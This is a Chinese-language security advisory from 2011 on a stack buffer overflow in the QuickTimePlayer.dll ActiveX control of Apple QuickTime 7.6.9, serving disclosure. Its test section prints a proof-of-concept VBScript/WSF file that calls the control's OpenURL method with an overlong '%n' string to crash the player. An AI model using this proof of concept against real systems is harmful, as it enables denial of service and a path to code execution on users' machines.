发布日期：2011-09-06
更新日期：2011-09-06

受影响系统：

Apple QuickTime Player 7.6.9

描述：

---

BUGTRAQ  ID: 49465

QuickTime是由苹果电脑所开发的一种多媒体架构，能够处理许多的数字视频、媒体段落、音效、文字、动画、音乐格式，以及交互式全景影像的数项类型。

Apple QuickTime在"QuickTimePlayer.dll" ActiveX控件的实现上存在缓冲区溢出漏洞，远程攻击者可利用此漏洞以当前用户权限执行任意代码，可能造成拒绝服务。

此漏洞源于QuickTimePlayer.dll组件信任了特定文件中嵌入的长度，以便计算缓冲区长度。然后应用程序将任意大小的字符串复制到栈上的静态缓冲区，造成任意代码执行。

<*来源：Ivan Sanchez
  
  链接：http://www.evilcode.com.ar/index.php/advisories/quick-time-player-7-6-9-buffer-overflow-vulnerability-in-an-activex-control.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.securityfocus.com/data/vulnerabilities/exploits/49465.html

crashapp.wsf

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:0F5B08E7-94EE-470B-A184-5CD4A7DF35A3' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\QuickTime\QuickTimePlayer.dll"
prototype  = "Sub OpenURL ( ByVal url As String )"
memberName = "OpenURL"progid     = "QuickTimePlayerLib.QuickTimePlayer"
argCount   = 1
arg1="%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
target.OpenURL arg1
</script>
</job>
</package>

建议：

---

厂商补丁：

Apple
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://support.apple.com/

浏览次数：3026
严重程度：0（网友投票）